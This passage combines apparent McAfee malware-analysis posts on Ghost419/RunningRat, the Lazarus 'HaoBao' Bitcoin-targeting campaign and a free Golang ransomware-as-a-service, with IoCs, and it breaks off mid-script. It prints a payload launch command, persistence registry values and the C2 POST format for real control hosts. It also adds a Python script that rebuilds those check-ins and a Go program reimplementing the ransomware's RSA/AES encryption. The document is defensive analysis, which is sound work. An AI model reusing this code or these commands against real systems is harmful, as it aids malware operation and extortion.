Ghost419

Ghost419 is a Korean-language implant that first appeared in the wild December 18, 2017, with the most recent sample appearing two days before the Olympics spear phishing email. The malware can be identified by the hardcoded string and URL parameter passed to the control server. Ghost419 can be traced to a sample created July 29, 2017, that appears to be a much earlier version (without the hardcoded identifier). The July version shares 46% of its code with samples created in late December. This early version implant creates a unique mutex value (kjie23948_34238958_KJ238742) that also appears in a sample from December, with the exception that one digit has changed. Ghost419 is based on Gold Dragon and Brave Prince implants and contains shared elements and code, especially for system reconnaissance functions.

Hardcoded “Ghost419” in the malware binary.

The string “WebKitFormBoundarywhpFxMBe19cSjFnG,” part of the upload mechanism, also appears in the Gold Dragon variants of late December 2017.

Gold Dragon sample.

Ghost419 sample.

Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon.

Gold Dragon user agent string.

Ghost419 user agent string.

 

RunningRat

RunningRat is a remote access Trojan (RAT) that operates with two DLLs. It gets its name from a hardcoded string embedded in the malware. Upon being dropped onto a system, the first DLL executes. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe, a Korean security program. The batch file then attempts to remove itself.

The first DLL unpacks a resource file attached to the DLL using a zlib decompression algorithm. The authors of the malware left the debugging strings in the binary, making the algorithm easy to identify. The second DLL is decompressed in memory and never touches the user’s file system; this file is the main RAT that executes. Finally, the first DLL adds the registry value “SysRat” under SoftWare\Microsoft\Windows\CurrentVersion\Run to ensure the malware is executed at startup.

After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with. This address is hardcoded in the second DLL as 200.200.200.13 and is modified by the first DLL to 223.194.70.136.

This type of behavior may indicate this code is being reused or is part of a malware kit.

The first DLL uses one common antidebugging technique by checking for SeDebugPrivilege.

Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information.

The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs.

From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed.

McAfee ATR analysts will continue to research RunningRat to determine if this extra code is used or is possibly left over from a larger RAT toolkit.

The second DLL employs a few additional antidebugging techniques. One is the use of a custom exception handler and code paths that are designed to generate exceptions.

There are also a few random empty-nested threads to slow down researchers during static analysis.

The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime.

  

Conclusion

The PowerShell script first discovered by McAfee ATR was delivered via a spear phishing campaign that used image steganography techniques to hide the first-stage implant. (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.)

The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed. The implants are delivered as a second stage once the attacker gains an initial foothold using fileless malware. Some of the implants will maintain their persistence only if Hangul Word, which is specific to South Korea, is running.

With the discovery of these implants, we now have a better understanding of the scope of this operation. Gold Dragon, Brave Prince, Ghost419, and RunningRat demonstrate a much wider campaign than previously known. The persistent data exfiltration we see from these implants could give the attacker a potential advantage during the Olympics.

We thank Charles Crawford and Asheer Malhotra for their support of this analysis.

 

Indicators of Compromise

IPs

  • 223.194.70.136

Domains

  • trydai.000webhostapp.com
  • follow_dai.000webhostapp.com
  • eodo1.000webhostapp.com
  • nid-help-pchange.atwebpages.com
  • ink.inkboom.co.kr
  • followgho.byethost7.com

Hashes

  • fef671c13039df24e1606d5fdc65c92fbc1578d9
  • 06948ab527ae415f32ed4b0f0d70be4a86b364a5
  • 96a2fda8f26018724c86b275fe9396e24b26ec9e
  • ad08a60dc511d9b69e584c1310dbd6039acffa0d
  • c2f01355880cd9dfeef75cff189f4a8af421e0d3
  • 615447f458463dc77f7ae3b0a4ad20ca2303027a
  • bf21667e4b48b8857020ba455531c9c4f2560740
  • bc6cb78e20cb20285149d55563f6fdcf4aaafa58
  • 465d48ae849bbd6505263f3323e818ccb501ba88
  • a9eb9a1734bb84bbc60df38d4a1e02a870962857
  • 539acd9145befd7e670fe826c248766f46f0d041
  • d63c7d7305a8b2184fff3b0941e596f09287aa66
  • 35e5310b6183469f4995b7cd4f795da8459087a4
  • 11a38a9d23193d9582d02ab0eae767c3933066ec
  • e68f43ecb03330ff0420047b61933583b4144585
  • 83706ddaa5ea5ee2cfff54b7c809458a39163a7a
  • 3a0c617d17e7f819775e48f7edefe9af84a1446b
  • 761b0690cd86fb472738b6dc32661ace5cf18893
  • 7e74f034d8aa4570bd1b7dcfcdfaa52c9a139361
  • 5e1326dd7122e2e2aed04ca4de180d16686853a7
  • 6e13875449beb00884e07a38d0dd2a73afe38283
  • 4f58e6a7a04be2b2ecbcdcbae6f281778fdbd9f9
  • 389db34c3a37fd288e92463302629aa48be06e35
  • 71f337dc65459027f4ab26198270368f68d7ae77
  • 5a7fdfa88addb88680c2f0d5f7095220b4bbffc1

Indicators of Compromise for Feb. 12 update:

Hashes

  • SHA-1: 7ae731d666e547b4f3442fe5675c8e8719d8d862

URLs

  • hxxps://minibodegaslock.cl:443/components/com_tags/controllers/default_tags.php
  • hxxps://minibodegaslock.cl/components/com_tags/controllers/access_log

The post Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems appeared first on McAfee Blogs.

Lazarus Resurfaces, Targets Global Banks and Bitcoin Users


This blog was written with support and contributions provided by Asheer Malhotra, Jessica Saavedra Morales, and Thomas Roccia.

McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact.

This new campaign, dubbed HaoBao, resumes Lazarus’ earlier use of phishing emails posing as employee recruitment, but now targets Bitcoin users and global financial organizations. When victims open the malicious documents attached to the emails, the malware scans for Bitcoin activity and then establishes an implant for long-term data gathering.

HaoBao targets and never-before-seen implants signal to McAfee ATR an ambitious campaign by Lazarus to establish cryptocurrency cybercrime at a sophisticated level.

Background

Beginning in 2017, the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters, which contained malicious documents. The campaign lasted from April to October and used job descriptions relevant to the target organizations, in both English and Korean. The objective was to gain access to the target’s environment and obtain key military program insight or steal money. The 2017 campaign targets ranged from defense contractors to financial institutions, including cryptocurrency exchanges; however, much of this fake job recruitment activity ceased months later, with the last activity observed October 22, 2017.

Analysis

On January 15, McAfee ATR discovered a malicious document masquerading as a job recruitment for a Business Development Executive located in Hong Kong for a large multinational bank. The document was distributed via a Dropbox account at the following URL:

hxxps://www.dropbox.com/s/qje0yrz03au66d0/JobDescription.doc?dl=1

This is the mark of a new campaign, though it uses techniques, tactics, and procedures observed in 2017. This document had the last author ‘Windows User’ and was created January 16, 2018, with Korean language resources. Several additional malicious documents with the same author appeared between January 16 and January 24, 2018.

Document summary from Virus Total

 

Malicious job recruitment documents


Victims are persuaded to enable content through a notification claiming the document was created in an earlier version of Microsoft Word. The malicious documents then launch an implant on the victim’s system via a Visual Basic macro.

Malicious Microsoft Word document

 

Implants dropped in campaign

The document (7e70793c1ca82006775a0cac2bd75cc9ada37d7c) created January 24, 2018, drops and executes an implant compiled January 22, 2018, with the name lsm.exe (535f212b320df049ae8b8ebe0a4f93e3bd25ed79). The implant lsm.exe contacted 210.122.7.129, which also resolves to worker.co.kr.

The other malicious document (a79488b114f57bd3d8a7fa29e7647e2281ce21f6) created January 19, 2018, drops the implant afb2595ce1ecf0fdb9631752e32f0e32be3d51bb, which is 99% similar to the lsm.exe implant.

This document was distributed from the following Dropbox URLs:

  • hxxps://dl.dropboxusercontent.com/content_link/AKqqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1
HTTP response for job description document

This implant (csrss.exe), compiled January 15, 2018, contacts the IP address 70.42.52.80, which resolves to deltaemis.com. We identified that this domain was used to host a malicious document from a previous 2017 campaign targeting the Sikorsky program.

  • hxxp://deltaemis.com/CRCForm/3E_Company/Sikorsky/E4174/JobDescription.doc

A third malicious document (dc06b737ce6ada23b4d179d81dc7d910a7dbfdde) created January 19, 2018 drops e8faa68daf62fbe2e10b3bac775cce5a3bb2999e which is compiled January 15, 2018. This implant communicates to a South Korean IP address 221.164.168.185 which resolves to palgong-cc.co.kr.

McAfee ATR analysis finds the dropped implants have never been seen before in the wild and have not been used in previous Lazarus campaigns from 2017. Furthermore, this campaign deploys a one-time data gathering implant that relies upon downloading a second stage to gain persistence. The implants contain a hardcoded word “haobao” that is used as a switch when executing from the Visual Basic macro.

Malicious Document Analysis

The malicious document contains two payloads embedded in the Visual Basic macro code as encrypted string arrays. They are decrypted in memory, written to disk, and launched in sequence: the second-stage malicious binary first, then the decoy document.

The VBA Macro code is self-executing and configured to execute when the OLE document (MS Word doc) is opened (via “Sub AutoOpen()”). The AutoOpen() function in the VBA Macro performs the following tasks in the sequence listed:

  • Decodes the target file path of the second stage binary payload. This file path is calculated based on the current user’s Temp folder location:

<temp_dir_path>\.\lsm.exe

VB code to decrypt second stage filepath
  • Decodes the second stage binary in memory and writes it to the %temp%\.\lsm.exe file location
second stage binary (MZ) as an encrypted String Array in the VBA Macro
second stage binary (MZ) decoded in memory by the VBA Macro
  • After writing the second stage payload to disk the VBA code performs two important actions.
    • Runs the second stage payload using cmd.exe. This is done so that the cmd.exe process exits as soon as the payload is launched; a process enumeration tool then cannot find the parent process, which leaves a smaller footprint.

cmdline for executing the second stage binary:

cmd.exe /c start /b <temp_dir_path>\.\lsm.exe /haobao

  • Adds persistence on the system by creating a shortcut in the user’s Startup folder with the correct cmdline arguments:

Link file command line: <temp_dir_path>\.\lsm.exe /haobao

Link File Name: GoogleUpdate.lnk

Trigger code for executing the second stage binary and establishing persistence

 

LNK file configuration for establishing persistence
  • Once the second stage payload has been launched, the VBA Macro proceeds to display a decoy document to the end user. This decoy document is also stored in the VBA Macro as an encrypted string array (similar to the second stage payload). The decoy document is again written to the user’s temp directory to the following filename/path:

<temp_dir_path>\.\Job Description.doc

Decoy Document decoded in memory by the VBA Macro
  • Once the decoy document has been written to disk, the VBA Macro sets its file attributes to System + Hidden
  • The decoy document is then opened by the malicious VBA Macro and the original malicious document’s caption is copied over to the decoy document to trick the end user into mistaking the decoy document for the original (malicious) document.
  • This activity, combined with the fact that the VBA Macro then closes the current (malicious) document, indicates that the VBA Macro aims to trick an unsuspecting user into thinking that the decoy document currently open is the original (malicious) document opened by the user.
  • Since the decoy document is a benign file and does not contain any macros the victim does not suspect any malicious behavior.

Implant Analysis

As part of the implant initialization activities, the implant does the following:

  • Checks the string passed to it through command line
    • “/haobao” in case of 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
    • “/pumpingcore” in case of e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

If the malware does not find this string in its cmdline arguments, it simply quits without going any further.

  • Unwraps a DLL into memory and calls its one-and-only export using reflective DLL loading.

DLL information

During our research, we discovered additional variants of the DLL file.


DLL information

 

  • As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory:
    • Copy the unwrapped DLL into new locations in its own memory space.
    • Build imports required by the DLL (based on the IAT of the DLL)
Imports builder code in malware for the DLL imports
  • Call the newly loaded DLL image’s Entry Point (DllMain) with DLL_PROCESS_ATTACH to complete successful loading of the DLL in the malware process.
DLL Entry Point Call from malware to finish loading of the DLL in memory
  • Call the actual malicious export in the DLL named “CoreDn”
Hardcoded DLL export name “CoreDn” in malware

All the malicious activities described below are performed by the DLL unless specified otherwise.

Data Reconnaissance

The implant has the capability of gathering data from the victim’s system. The following information will be gathered and sent to the command and control server.

  • Computer name and currently logged on user’s name, stored in the format

<ComputerName> \ <Username>

Malware obtaining the computer name and user name
  • List of all processes currently running on the system arranged in format

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

Malware collecting process information from endpoint
  • The presence of a specific registry key on the system

HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

  • The malware appends an indicator (flag) specifying whether the above registry key was found in the user’s registry:

This key is checked again as part of the command and control communication and is sent as a duplicate value to the command and control server in the HTTP POST request as well (explained below).

Malware checking for the presence of the registry key

Exfiltration

Preparation

In preparation of the exfiltration of information collected from the endpoint, the malware performs the following activities:

  • Encode the collected information using a simple byte based XOR operation using the byte key: 0x34.
  • Base64 encode (standard) the XORed data.
  • Again, check for the presence of the Registry Key: HKCU\Software\Bitcoin\Bitcoin-Qt

 

Command and Control Server Communication

Once the malware has performed all these activities it sends an HTTP POST request to the CnC server:

  • www[dot]worker.co.kr for md5 BDAEDB14723C6C8A4688CC8FC1CFE668
  • www[dot]palgong-cc.co.kr for md5 D4C93B85FFE88DDD552860B148831026

 

In the format:

HTTP POST to www[dot]worker.co.kr

/board2004/Upload/files/main.asp?idx=%d&no=%s&mode=%s

OR

 

HTTP POST to www[dot]palgong-cc.co.kr

/html/course/course05.asp?idx=%d&no=%s&mode=%s

where

idx= 20 (14h) if the Registry key does not exist; 24 (18h) if the key exists.

no= XORed + base64 encoded “<Computername> \ <username>”

mode= XORed + base64 encoded Process listing + Registry key flag

Command and control server domain
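The preparation and check-in steps above amount to a small wire format: XOR every byte with 0x34, Base64-encode the result, and place the two fields in the query string of a POST to one of the two control server paths, with idx signalling whether the Bitcoin-Qt registry key was found. The script below is an added example, not McAfee's code or the implant's, that builds such a request from constructed recon data and decodes a captured one back into the computer name, user name, process list and flag. Two details are assumptions: the post does not say how the appended flag is encoded, so a single 'Y'/'N' byte stands in for it, and the `%s` format string suggests the implant may not URL-encode the Base64, so the decoder accepts both raw and percent-encoded fields.

```python
"""Build and decode the HaoBao check-in request described above."""
import base64
from urllib.parse import quote, unquote

XOR_KEY = 0x34            # single-byte XOR key from the post
IDX_KEY_ABSENT = 20       # 0x14: HKCU\Software\Bitcoin\Bitcoin-Qt not found
IDX_KEY_PRESENT = 24      # 0x18: key found
CNC_PATHS = {             # the two control server paths from the post
    "www.worker.co.kr": "/board2004/Upload/files/main.asp",
    "www.palgong-cc.co.kr": "/html/course/course05.asp",
}


def encode_field(data: bytes) -> str:
    """Preparation step: XOR every byte with 0x34, then standard Base64."""
    return base64.b64encode(bytes(b ^ XOR_KEY for b in data)).decode("ascii")


def decode_field(field: str) -> bytes:
    """Inverse of encode_field: Base64-decode, then XOR again (XOR with a constant is its own inverse)."""
    return bytes(b ^ XOR_KEY for b in base64.b64decode(field))


def build_checkin(host, computer, user, processes, wallet_key_present):
    """Reconstruct the POST request the implant sends.
    The post only says a flag is appended to the process listing; the single
    'Y'/'N' byte used here is an assumption about its encoding."""
    no = f"{computer} \\ {user}".encode()
    mode = "".join(f"{p}\r\n" for p in processes).encode() + (b"Y" if wallet_key_present else b"N")
    idx = IDX_KEY_PRESENT if wallet_key_present else IDX_KEY_ABSENT
    query = (f"idx={idx}&no={quote(encode_field(no), safe='')}"
             f"&mode={quote(encode_field(mode), safe='')}")
    return f"POST {CNC_PATHS[host]}?{query} HTTP/1.1\r\nHost: {host}\r\n\r\n"


def parse_checkin(request):
    """Decode a captured check-in back into the recon data. Uses unquote(), not
    unquote_plus(), so a '+' in the Base64 survives whether or not the sender
    percent-encoded the query (the %s format string suggests it may not)."""
    request_line = request.split("\r\n", 1)[0]
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key] = unquote(value)
    computer, _, user = decode_field(params["no"]).decode().partition(" \\ ")
    parts = decode_field(params["mode"]).decode().split("\r\n")
    idx = int(params["idx"])
    return {
        "method": method, "path": path, "idx": idx,
        "wallet_key_present": idx == IDX_KEY_PRESENT,
        "computer": computer, "user": user,
        "processes": parts[:-1],   # every process name is followed by \r\n ...
        "flag": parts[-1],         # ... so the trailing segment is the appended flag
    }


if __name__ == "__main__":
    # Constructed victim data, not from a real infection.
    req = build_checkin("www.worker.co.kr", "WIN-LAB01", "alice",
                        ["explorer.exe", "bitcoin-qt.exe"], wallet_key_present=True)
    print(req)
    print(parse_checkin(req))
```

Because the key is a single constant byte, the "encryption" offers no confidentiality against anyone who has read the sample; the decoder is what an analyst runs over proxy captures to see which hosts the implant has fingerprinted and which of them reported a Bitcoin-Qt installation (idx=24).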

Persistence

The malware itself establishes persistence only for the downloaded implant. Persistence for the first-stage implant is established by the Visual Basic macro code executed when the victim opens the document, as described above. The implant writes its own persistence entry ONLY if it successfully executes the downloaded implant. The malware first tries to update the HKEY_LOCAL_MACHINE registry key.

If the update is unsuccessful then it also tries to update the HKEY_CURRENT_USER registry key. Value written to registry to achieve persistence on the endpoint:

Registry Subkey = Software\Microsoft\Windows\CurrentVersion\Run

Value Name = AdobeFlash

Value Content = “C:\DOCUME~1\<username>\LOCALS~1\Temp\OneDrive.exe” kLZXlyJelgqUpKzP

Registry based persistence of the second stage payload

Connections to 2017 campaigns

The techniques, tactics and procedures are very similar to the campaigns that targeted US Defense contractors, US Energy sector, financial organizations and crypto currency exchanges in 2017.

The same Windows User author appeared back in 2017 in two malicious documents 비트코인_지갑주소_및_거래번호.doc and 비트코인 거래내역.xls which were involved in crypto currency targeting. Furthermore, one of the implants communicates to an IP address that was involved in hosting malicious job description documents in 2017 involving the Sikorsky military program.

McAfee Advanced Threat Research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:

  • Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017
  • Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns
  • Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns
  • The techniques, tactics and procedures align with Lazarus group’s interest in crypto currency theft

Conclusion

In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans.

 

Indicators of Compromise

MITRE ATT&CK techniques

  • Data encoding
  • Data encrypted
  • Command-Line Interface
  • Account discovery
  • Process Discovery
  • Query registry
  • Hidden files and directories
  • Custom cryptographic protocol
  • Registry Run Keys / Start Folder
  • Startup Items
  • Commonly used port
  • Exfiltration Over Command and Control Channel

IPs

  • 210.122.7.129
  • 70.42.52.80
  • 221.164.168.185

URLs

  • hxxps://dl.dropboxusercontent.com/content_link/AKqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1

Hashes

  • dc06b737ce6ada23b4d179d81dc7d910a7dbfdde
  • a79488b114f57bd3d8a7fa29e7647e2281ce21f6
  • 7e70793c1ca82006775a0cac2bd75cc9ada37d7c
  • 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
  • 1dd8eba55b16b90f7e8055edca6f4957efb3e1cd
  • afb2595ce1ecf0fdb9631752e32f0e32be3d51bb
  • e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

McAfee Detection

  • BackDoor-FDRO!
  • Trojan-FPCQ!
  • RDN/Generic Downloader.x
  • RDN/Generic Dropper
  • RDN/Generic.dx

The post Lazarus Resurfaces, Targets Global Banks and Bitcoin Users appeared first on McAfee Blogs.

Free Ransomware Available on Dark Web


The McAfee Advanced Threat Research team recently analyzed a ransomware-as-a-service threat that is available for free and without registration. This malware was first seen in July 2017 with the extension .shifr. It has now appeared in recent detections with the extension .cypher.

Ransomware-as-a-Service

Ransomware-as-a-service is a cybercrime economic model that allows malware developers to earn money for their creations without the need to distribute their threats. Nontechnical criminals buy their wares and launch the infections, while paying the developers a percentage of their take. The developers run relatively few risks, and their customers do most of the work.

Some ransomware-as-a-service offerings, such as RaaSberry, use subscriptions, while others require registration to gain access to the ransomware. The ransomware developer hosts a service on the “dark web” that allows any buyer to create and modify the malware. For example, the buyer can add custom ransom notes and set the amount of the payment. More advanced services offer features such as evasion techniques to avoid detection and analysis. The service can also offer a control server with an administration panel to manage each victim. This system is convenient for both the developer, who makes money by selling malware, and for buyers, who gain ready-to-deploy ransomware without needing any specific coding knowledge.

The underground economy behind this service is well organized, effectively offering a cybercrime infrastructure. Basically, the ransomware is available on a website. The buyer sets up the ransomware by adding a wallet address. The ransomware is then available to download. The buyer just needs to customize and spread the malware. When a victim pays the ransom, a percentage is delivered both to the buyer and to the malware coder.

The ransomware is available on the TOR network at hxxp://kdvm5fd6tn6jsbwh.onion. A web page guides buyers through the configuration process.

On the configuration page, a generic XMPP address suggests we may have found a demo version of the ransomware.

On the page, the buyer need only add a Bitcoin wallet address and the amount of the ransom. Once that is done, the malware is generated and can be downloaded. With this malware, the developer earns a 10% commission on every payment. Now let’s look at the malware sample.

Dynamic Analysis

When the malware launches on the victim’s system, it checks for an Internet connection. If there is none, it exits the process. Otherwise, it contacts the following addresses to download the encryption key:

Once the file is running, it creates several files on the system:

  • Encryption_key: the RSA key encrypted in AES
  • Lock_file: an indicator that the system is encrypted
  • Uuid_file: a reference for the infected machine. A TOR address is generated with this ID.

The encryption key is downloaded from hxxps://kdvm5fd6tn6jsbwh.onion.to/new_c/xmKksHw53W433lmvNsdzGxqWLcPLA44Dyna.

The ransom note is created on the desktop.

The file “HOW_TO_DECRYPT_FILES.html” gives a link to the TOR network.

Once the files are encrypted, the ransom note is displayed in HTML and points to the TOR site hxxp://kdvm5fd6tn6jsbwh.onion/ with the ID of the infected machine.

Allegedly after payment, the victim can download the file decrypter.exe and unlock encrypted files, which have the extension .cypher.

The malware encrypts the following file extensions:

The targeted extensions include many picture and photography formats related to Canon, Kodak, Sony, and others. There are also extensions for AutoCAD and Autodesk projects, scalable vector images, and Microsoft Office files. These files are mostly used by designers, photographers, architects, and many others.

Digging Deeper

The malware runs on 64-bit systems and is coded in Golang (“Go language,” from Google), a programming language similar to C with some improvements in error management. It is not common to find malware written in Golang, although this is not the first time that we have analyzed such a sample. This threat is large compared with most other malware, at more than 5.5MB. The file size can make analysis more difficult and can also help evade antimalware products that cap the size of the files they inspect.

Reverse engineering Golang is a bit different from other languages. Golang binaries are usually bigger than other executables because, by default, the compiler statically links the program’s libraries, resulting in a bigger file.

A drawback for attackers is that such big binaries can be easily detected on a corporate network. Large files are “noisier” and may appear suspicious when arriving from an external source. They can also be less convenient for attackers to deal with because they can make the infection process more difficult.

The first interesting function to analyze in a Golang binary is the “main_main.” The malware starts by gathering environment variables. It then checks whether the file “lock_file” exists in the directory C:\Users\<username>\AppData\Roaming.

The function “main_Exists” will check for the file. If it does not exist, the malware exits the process.

If the file does exist, the malware downloads the public key from the control server.

The malware contacts the address hxxps://kdvm5fd6tn6jsbwh.onion/new_c/<nameofmalware>. The encryption public key is stored directly on the website.

This address is generated when the buyer creates the ransomware on the developer’s web page; thus the same malware encrypts files with the same public key.

The malware generates the AES key and tries to find any network share by iterating over the drive letters.

This function tries to find network shares:

Before a file is encrypted, the malware creates another file in C:\Users\<username>\AppData\Roaming\uuid_file to use as a victim identifier.

The malware encrypts the files using AES and deletes the originals after encryption with the function “os.Remove,” to avoid any simple recovery. Because os.Remove is an ordinary unlink rather than a secure wipe, the original contents remain on disk until those blocks are reused, so file carving may still recover some of them.

The decrypter, which can be downloaded, works in a similar way but it requests the private key that the victims must pay for at hxxps://kdvm5fd6tn6jsbwh.onion.to/get_privkey/math/big. The mechanism behind the encryption routine seems to be on the online server and the decryption key cannot be easily recovered.
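The key handling described above (a downloaded RSA public key, a locally generated AES key, files rewritten with the .cypher extension, and a decrypter that needs the operator’s private key) is easiest to see in code. The following Go program is an added illustration of that hybrid scheme, not code from the malware or from McAfee; it works only on in-memory buffers and touches no files. It assumes that the encryption_key artifact holds the AES key wrapped with the RSA public key (the reading consistent with the decrypter needing the private key), and it uses RSA-OAEP and AES-256-GCM as the concrete primitives, which the page does not specify.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
	"strings"
)

// UnwrapKey recovers the per-victim AES key from its RSA-OAEP wrapping; it needs
// the private key the victim is asked to pay for.
func UnwrapKey(priv *rsa.PrivateKey, wrapped []byte) ([]byte, error) {
	return rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, wrapped, nil)
}

func newGCM(aesKey []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(aesKey)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// EncryptBlob seals one file's contents with AES-256-GCM; the random nonce is prefixed.
func EncryptBlob(aesKey, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(aesKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// DecryptBlob reverses EncryptBlob; a wrong key or a tampered blob fails authentication.
func DecryptBlob(aesKey, blob []byte) ([]byte, error) {
	gcm, err := newGCM(aesKey)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, errors.New("ciphertext too short")
	}
	return gcm.Open(nil, blob[:gcm.NonceSize()], blob[gcm.NonceSize():], nil)
}

// SimulateEncrypt plays the infection role over an in-memory set of files. It returns
// the RSA-wrapped AES key (the page's encryption_key artifact, as assumed here) and the
// "<name>.cypher" ciphertexts; the plaintext AES key does not survive the call.
func SimulateEncrypt(pub *rsa.PublicKey, files map[string][]byte) ([]byte, map[string][]byte, error) {
	aesKey := make([]byte, 32) // fresh AES-256 key for this victim
	if _, err := rand.Read(aesKey); err != nil {
		return nil, nil, err
	}
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, aesKey, nil)
	if err != nil {
		return nil, nil, err
	}
	cts := map[string][]byte{}
	for name, data := range files {
		ct, err := EncryptBlob(aesKey, data)
		if err != nil {
			return nil, nil, err
		}
		cts[name+".cypher"] = ct
	}
	return wrapped, cts, nil
}

// SimulateDecrypt plays the decrypter role: unwrap with the private key, then open each blob.
func SimulateDecrypt(priv *rsa.PrivateKey, wrapped []byte, cts map[string][]byte) (map[string][]byte, error) {
	aesKey, err := UnwrapKey(priv, wrapped)
	if err != nil {
		return nil, fmt.Errorf("unwrap: %w", err)
	}
	out := map[string][]byte{}
	for name, ct := range cts {
		pt, err := DecryptBlob(aesKey, ct)
		if err != nil {
			return nil, fmt.Errorf("%s: %w", name, err)
		}
		out[strings.TrimSuffix(name, ".cypher")] = pt
	}
	return out, nil
}

func main() {
	operator, _ := rsa.GenerateKey(rand.Reader, 2048) // only the public half would ship with the malware
	wrapped, cts, _ := SimulateEncrypt(&operator.PublicKey, map[string][]byte{"plan.dwg": []byte("constructed sample")})
	back, err := SimulateDecrypt(operator, wrapped, cts)
	fmt.Println(string(back["plan.dwg"]), err)
}
```

The point is the last step: SimulateDecrypt fails with any key other than the operator’s, and the plaintext AES key no longer exists on the victim side once SimulateEncrypt returns. Recovering files without paying therefore depends on an implementation flaw (a reused or hard-coded key, a leaked private key, an unwiped key still in process memory) rather than on the cryptography itself.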

The following information describes the decrypter.

Conclusion

Cybercrime-as-a-service is not new, yet it is now more widespread than ever. In this case, the malware is available for free but the ransomware developer earns a 10% fee from each victim who pays a ransom. The use of Golang is not common for malware. Most ransomware-as-a-service is not free, which could indicate this might be a demonstration version, or a proof of concept for future sale.

This malware is not advanced and was coded without evasion techniques, such as a domain generation algorithm, SSL/TLS for control-server traffic, encryption of its own code or strings, or even file compression. The targeted file extensions suggest the victims can range from general home or business users to the graphics industry. Although such malware is not difficult to analyze, it can be very destructive in a corporate environment.

Keep in mind that paying a ransom is no guarantee of receiving a decryption key. McAfee advises that you never pay a ransom. You can find further information and help on unlocking some ransomware threats at https://www.nomoreransom.org.

McAfee detects this threat as Ransomware-FPDS!0F8CCEE515B8.

Indicators of Compromise

Hashes:

  • cb73927aa749f88134ab7874b15df898c014a35d519469f59b1c85d32fa69357
  • 0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c

Onion address:

  • hxxp://kdvm5fd6tn6jsbwh.onion

Files created:

  • C:\Users\<username>\AppData\Roaming\uuid_file
  • C:\Users\<username>\AppData\Roaming\lock_file
  • C:\Users\<username>\AppData\Roaming\encryption_key
  • C:\Users\<username>\Desktop\HOW_TO_DECRYPT_FILES.html

Encryption extension:

  • .cypher
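A responder holding the IoCs above can check a host for them without running anything of the attacker’s. The following Go program is an added example, not a McAfee tool: it walks a directory tree, collects the marker files named in the IoC list and counts files carrying the .cypher extension. The USERPROFILE root in main is an assumption for this example, and the directory layout used to exercise it is constructed, not captured from an infection.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// markerNames are the basenames of the host artifacts listed in the IoC section,
// compared case-insensitively because NTFS is case-insensitive.
var markerNames = map[string]bool{
	"lock_file":                 true,
	"uuid_file":                 true,
	"encryption_key":            true,
	"how_to_decrypt_files.html": true,
}

// Report is the outcome of one triage walk.
type Report struct {
	Markers     []string // full paths of marker files found
	CypherFiles int      // files carrying the .cypher extension
	SkippedErrs int      // entries that could not be read and were skipped
}

// Infected is a deliberately strict verdict: a marker file alone could be a
// leftover or a false positive, so require encrypted files as well.
func (r Report) Infected() bool {
	return len(r.Markers) > 0 && r.CypherFiles > 0
}

// Triage walks root (on Windows typically %USERPROFILE%, which contains both
// AppData\Roaming and Desktop) and collects the artifacts without modifying anything.
func Triage(root string) (Report, error) {
	var r Report
	err := filepath.Walk(root, func(path string, info os.FileInfo, walkErr error) error {
		if walkErr != nil {
			r.SkippedErrs++
			return nil // keep going; an unreadable directory must not abort the scan
		}
		if info.IsDir() {
			return nil
		}
		name := strings.ToLower(info.Name())
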